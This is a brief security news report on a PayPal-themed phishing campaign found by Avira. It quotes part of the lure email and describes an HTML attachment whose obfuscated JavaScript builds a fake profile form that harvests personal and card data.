14 DAY TRIAL // German antivirus vendor Avira has intercepted a new phishing campaign, which generates fake emails posing as security notifications from PayPal.
The rogue emails bear a subject of "Notification Of Limited Account Access RXI034" (the final ID can differ) and purport to originate from a [email protected] address.
The contained message is well formulated and instructs recipients to open the attached .html file in order to provide account verification information.
Part of the message, allegedly signed by the PayPal Review Department, reads as following:
"Dear Member,
As part of our efforts to provide a safe and secure environment for the online community, we regularly screen account activity.
Our review of you account has identified an issue regarding its safe use. We have placed a restriction on your account as a precaution.
To lift the restriction we will require some further information from you. […]
We have sent you an attachment which contains all the necessary steps in order to restore your account access. Download and open it in your browser."
Unlike most HTML attachments encountered in spam, this particular file is not a script that redirects to an external URL.
Instead, the document contains highly obfuscated JavaScript code, which generates a "Profile Update" page that mimics the appearance of the PayPal site.
The page displays a form which asks for a wealth of information ranging from personal and credit card details to employer and mother's maiden names.
According to Sorin Mustaca, a data security expert at Avira, form data is sent to a processing script hosted on a third party domain, which performs some basic checks before storing it.
For example, the researcher notes that he was able to input a bogus Visa credit card number only after using a sequence of 16 digits that started with 4.
A recent Avira report revealed that PayPal remains the most phished brand on the Internet and accounted for 57.25% of all such attacks detected last month.
